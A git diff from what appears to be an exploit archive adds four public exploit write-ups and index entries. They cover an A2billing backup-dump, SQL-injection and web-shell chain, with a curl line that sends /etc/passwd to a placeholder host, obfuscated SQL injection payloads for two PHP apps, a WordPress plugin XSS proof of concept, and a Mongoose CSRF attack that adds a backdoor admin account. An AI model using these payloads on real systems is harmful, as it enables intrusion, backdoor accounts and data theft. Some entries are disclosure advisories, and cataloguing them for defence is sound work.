diff --git a/files.csv b/files.csv
index 8b891ecc0..37f9626c8 100644
--- a/files.csv
+++ b/files.csv
@@ -9233,7 +9233,7 @@ id,file,description,date,author,platform,type,port
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
-10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
+10,platforms/linux/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
@@ -15791,6 +15791,7 @@ id,file,description,date,author,platform,type,port
 42559,platforms/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
 42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
 42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
+42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38395,3 +38396,7 @@ id,file,description,date,author,platform,type,port
 42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0
 42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0
 42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0
+42616,platforms/php/webapps/42616.txt,"A2billing 2.x - Backup File Download / Remote Code Execution",2017-09-04,0x4148,php,webapps,0
+42617,platforms/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",php,webapps,0
+42618,platforms/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin Lim",php,webapps,0
+42619,platforms/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42616.txt b/platforms/php/webapps/42616.txt
new file mode 100755
index 000000000..6923f250c
--- /dev/null
+++ b/platforms/php/webapps/42616.txt
@@ -0,0 +1,110 @@
+# Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw
+# Vulnerable software : A2billing 2.x
+# Author : Ahmed Sultan (0x4148)
+# Email : 0x4148@gmail.com
+# Home : 0x4148.com
+# Linkedin : https://www.linkedin.com/in/0x4148/
+
+A2billing contain multiple flaws which can be chained together to achieve shell access over the a2b instance
+
+If you're looking for deep technical stuff , check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/
+
+1 . backup dump
+Vulnerable code
+File : admin/public/form_data/FG_var_backup.inc
+getpost_ifset(array('name','path','creationdate'));
+
+$HD_Form = new FormHandler("cc_backup","Backup");
+
+$HD_Form -> FG_DEBUG = 0;
+
+if ($form_action!='ask-add')
+check_demo_mode();
+
+if ($form_action == 'add'){
+$backup_file = $path;
+
+if (substr($backup_file,-3)=='.gz'){
+// WE NEED TO GZIP
+$backup_file = substr($backup_file,0,-3);
+$do_gzip=1;
+}
+// Make the backup stuff here and redirect to success page
+//mysqldump -all --databases mya2billing -ua2billinguser
+-pa2billing > /tmp/test.sql
+//pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql
+mya2billing
+
+if (DB_TYPE != 'postgres'){
+$run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."'
+-p'".PASS."' > '{$backup_file}'";
+}else{
+$env_var="PGPASSWORD='".PASS."'";
+putenv($env_var);
+$run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}'
+".DBNAME;
+}
+if ($FG_DEBUG == 1 ) echo $run_backup."<br>";
+>>>> exec($run_backup,$output,$error);
+if ($do_gzip){
+// Compress file
+$run_gzip = GZIP_EXE." '$backup_file'";
+if ($FG_DEBUG == 1 ) echo $run_gzip."<br>";
+>>>> exec($run_gzip,$output,$error_zip);
+}
+
+File is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place so to dump full backup we can just move to :
+http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql
+backup will be found at admin/Public/0x4148.sql
+
+few hardening is being carried out by the application which did great job preventing direct RCE flaw , so we had to figure out sth else
+
+2 . SQL injection
+File name : ckeckout_process.php
+Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name,
+agent_email_address, item_name, item_id, item_quantity, payment_method,
+cc_type, cc_owner, cc_number, " .
+" cc_expires, orders_status, last_modified, date_purchased,
+orders_date_finished, orders_amount, currency, currency_value) values (" .
+" '".$transaction_data[0][1]."', '".$customer_info[3]."
+".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '".
+$customer_info[0]."', 1, '$pmodule',
+'".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."',
+'".$transaction_data[0][6]."', '".
+$transaction_data[0][7]."', $orderStatus, '".$nowDate."',
+'".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '".
+$currencyObject->get_value($currCurrency)."' )";
+$result = $DBHandle_max -> Execute($Query);
+
+By exploiting this flaw we can insert malicious data into the db using the following query <thanks to i-Hmx for the great hint>
+transactionID=456789111111 unise//**lecton selinse//**rtect
+1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**-
+-&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb
+After sending this request the following payload "<?php
+eval(base64_decode($_POST[nailit])); ?>" will be injected directly into the
+DB
+
+3 . RCE
+after injecting the malicious code we can just dump backup again but this time we will name it "0x4148.php" , so our code can be executed :)
+
+[root@localhost Public]# curl '
+https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php' --insecure
+[root@localhost Public]# cat 0x4148.php | grep nailit
+INSERT INTO `cc_payments_agent` VALUES (295,2,'
+','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28
+10:57:10','2016-10-28 10:57:10','2016-10-28
+10:57:10','usd','0.000000'),(296,2,'
+','','balance','',1,'plugnpay','','<?php
+eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28
+10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000');
+
+Now just exploit it via post nailit=base64_encoded php code to admin/Public/0x4148.php for instance system(‘x=$(cat /etc/passwd);curl -d “$x”
+http://x.x.x.x:8000/0x4148.jnk’); will read /etc/passwd and send it to our nc listener
+
+Exploit timeline :
+01/10/2016 : vulnerability reported to vendor
+06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
+04/09/2017 : Public release
+
+Credits,
+Ahmed Sultan - Cyber Security Analyst @ EG-CERT
\ No newline at end of file
diff --git a/platforms/php/webapps/42617.txt b/platforms/php/webapps/42617.txt
new file mode 100755
index 000000000..22fbddbee
--- /dev/null
+++ b/platforms/php/webapps/42617.txt
@@ -0,0 +1,31 @@
+# # # # # 
+# Exploit Title: iGreeting Cards 1.0 - SQL Injection
+# Dork: N/A
+# Date: 04.09.2017
+# Vendor Homepage: http://coryapp.com/
+# Software Link: http://coryapp.com/?product&index
+# Demo: http://coryapp.com/demo/greetingcards/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?index&search&k=[SQL]
+# 
+# eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+-
+# 
+# http://localhost/[PATH]/index.php?index&index&p=[SQL]
+# 
+# http://localhost/[PATH]/index.php?category&index&id=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42618.txt b/platforms/php/webapps/42618.txt
new file mode 100755
index 000000000..113b88cce
--- /dev/null
+++ b/platforms/php/webapps/42618.txt
@@ -0,0 +1,72 @@
+# Exploit Title: Wordpress Plugin Participants Database < 1.7.5.10 - XSS
+# Google Dork: inurl:wp-content/plugins/participants-database/
+# Date: 01-Sep-17
+# Exploit Author: Benjamin Lim
+# Vendor Homepage: https://xnau.com/
+# Software Link: https://wordpress.org/plugins/participants-database/
+# Version: 1.7.5.9
+# Tested on: Kali Linux 2.0
+# CVE : CVE-2017-14126
+
+
+1. Product & Service Introduction:
+==================================
+Participants Database is a Wordpress plugin for managing a database of
+participants, members or volunteers. As of now, the plugin has been
+downloaded 320,000 times and has 10,000+ active installs.
+
+
+2. Technical Details & Description:
+===================================
+Cross site scripting (XSS) vulnerability in the Wordpress Participants
+Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
+the Name parameter.
+The XSS vulnerability is found on the participant signup form input
+textfield. The get_field_value_display() function in
+PDb_FormElement.class.php did not escape HTML special characters, allowing
+an attacker to input javascript. The XSS code will be executed on 2 pages.
+
+1) The "Thank you for signing up" page immediately after submitting the
+form.
+2) The page which is configured to output the list of participants with the
+[pdb_list] shortcode.
+
+
+3. Proof of Concept (PoC):
+==========================
+
+curl -k -F action=signup -F subsource=participants-database -F
+shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
+-F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F
+first_name=<script>alert("1");</script> -F last_name=a -F email=a@a.com -F
+mailing_list=No -F submit_button=Submit http://localhost/?page_id=1
+
+To trigger manually, browse to the page, input the following in the form
+and click Sign Up.
+
+First Name: <script>alert("1");</script>
+Last Name: test
+Email: test@test.com
+
+
+4. Mitigation
+=============
+Update to version 1.7.5.10
+
+
+5. Disclosure Timeline
+======================
+2017/09/01 Vendor contacted
+2017/09/02 Vendor responded
+2017/09/03 Update released
+2017/09/06 Advisory released to the public
+
+
+6. Credits & Authors:
+=====================
+Benjamin Lim - [https://limbenjamin.com]
+
+--
+*Benjamin Lim*
+E: mail@limbenjamin.com
+PGP : https://limbenjamin.com/pgp
diff --git a/platforms/php/webapps/42619.txt b/platforms/php/webapps/42619.txt
new file mode 100755
index 000000000..20797769a
--- /dev/null
+++ b/platforms/php/webapps/42619.txt
@@ -0,0 +1,39 @@
+# # # # # 
+# Exploit Title: The Car Project 1.0 - SQL Injection
+# Dork: N/A
+# Date: 05.09.2017
+# Vendor Homepage: http://thecarproject.org/
+# Software Link: http://thecarproject.org/thecarproject.zip
+# Demo: http://www.thecarproject.org/cp
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Vulnerable Source:
+#
+# <?php
+# .............
+# if(isset($_GET['car_id'])) {
+# $motor_id = $_GET['car_id'];
+# if (!empty($_GET['man_id'])){
+# $manufacturer_id = $_GET['man_id'];
+# }
+# .............
+# ?>
+#
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/info.php?car_id=[SQL]
+# 
+# -5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,0x283229,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,(44),0x28343529,0x28343629,0x28343729,0x28343829,0x28343929)
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/remote/42614.txt b/platforms/windows/remote/42614.txt
new file mode 100755
index 000000000..38a6a56ea
--- /dev/null
+++ b/platforms/windows/remote/42614.txt
@@ -0,0 +1,198 @@
+[+] Credits: John Page AKA hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt
+[+] ISR: apparitionSec            
+ 
+
+
+Vendor:
+===============
+www.cesanta.com
+
+
+
+Product:
+==================
+Mongoose Web Server (Free Edition)
+Mongoose-free-6.5.exe
+Download: https://cesanta.com/binary.html
+
+
+Mongoose - GitHub's most popular embedded web server
+and multi-protocol networking library
+
+Mongoose Embedded Web Server Library - Mongoose is more than an embedded webserver. It is a multi-protocol embedded networking library
+with functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more.
+
+
+
+Vulnerability Type:
+===================
+CSRF - Command Execution
+
+
+
+CVE Reference:
+==============
+CVE-2017-11567
+
+
+
+Security Issue:
+================
+Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visit attacker controlled web page
+can execute system commands on the system hosting Mongoose server. However, IF Mongoose web server is installed as service then
+executing programs e.g. "calc.exe" may at times crash or fail to appear, but you may see it in Windows taskmgr.exe.
+Therefore, from my tests commands may become unstable when Mongoose is run as a service.
+
+When Mongoose is run standard mode attackers can potentially modify "Mongoose.conf" and create arbitrary files on server like .PHP etc.
+to point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new attacker generated
+file, after injecting commands into Mongoose web servers log file that will get excuted when log file is later requested.
+
+This vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language
+"pl,php,cgi" used, so when we can set to use correct programming language when file is created during initial CRSF attack.
+
+Note: If running commands with arguments, we have to use "\t" tab chars as using space will break our TELNET based code injection
+to the server log.
+
+e.g.
+
+GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1
+
+OR just TELNET to Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET.
+
+
+After Command Injection "Mongoose.conf" will be:
+
+# Mongoose web server configuration file.
+# For detailed description of every option, visit
+# https://github.com/cesanta/Mongoose
+# Lines starting with '#' and empty lines are ignored.
+# To make a change, remove leading '#', modify option's value,
+# save this file and then restart Mongoose.
+
+# access_control_list 
+access_log_file C:\Mongoose.access.php     <======= BOOM
+# auth_domain mydomain.com
+cgi_interpreter c:\xampp\php\php.exe     <====== MUST BE SET
+# cgi_pattern **.cgi$|**.pl$|**.php$
+# dav_auth_file 
+# dav_root 
+# debug 0
+document_root C:\
+# enable_directory_listing yes
+# error_log_file 
+# extra_headers 
+# extra_mime_types 
+# global_auth_file 
+# hide_files_patterns 
+# hexdump_file 
+index_files Mongoose.access.php   <======== BOOM
+# listening_port 8080
+# run_as_user 
+# ssi_pattern **.shtml$|**.shtm$
+# ssl_certificate 
+# ssl_ca_certificate 
+# start_browser yes
+# url_rewrites
+
+
+
+Mongoose log file Command Inject to create backdoor.
+-----------------------------------------------------------
+
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
+2017-07-24 03:12:30 - 127.0.0.1 - GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> 400 0 -
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin
+2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -
+ 
+
+Tested Windows 7.
+
+
+
+Exploit/POC:
+=============
+
+1) add backdoor account POC.
+
+<form action="http://127.0.0.1:8080/__mg_admin?save" method="post">
+<input type="hidden" name="access_log_file" value="Mongoose.access.php">
+<input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.php">
+<input type="hidden" name="index_files" value="Mongoose.access.php">
+<input type="hidden" name="cgi_interpreter" value="c:\xampp\php\php.exe">
+<script>document.forms[0].submit()</script>
+</form>
+
+
+2) TELNET x.x.x.x 8080
+GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1
+
+Enter
+
+Enter
+
+TELNET x.x.x.x 8080
+GET / HTTP/1.1
+
+Enter
+
+Enter
+
+Done, backdoor added!
+
+
+====================
+
+1) run calc.exe POC.
+
+<form action="http://127.0.0.1:8080/__mg_admin?save" method="post">
+<input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.exe">
+<input type="hidden" name="index_files" value="../../../../../../Windows/system32/calc.exe">
+<input type="hidden" name="cgi_interpreter" value="../../../../../../Windows/system32/calc.exe">
+<script>document.forms[0].submit()</script>
+</form>
+
+2) TELNET x.x.x.x 8080
+GET / HTTP/1.1
+
+Enter
+
+Enter
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=================================
+Vendor Notification: July 23, 2017
+Vendor Notification: July 28, 2017
+Vendor Acknowledgement: July 31, 2017
+Vendor Fixed released version  6.9 : September 4, 2017
+September 4, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file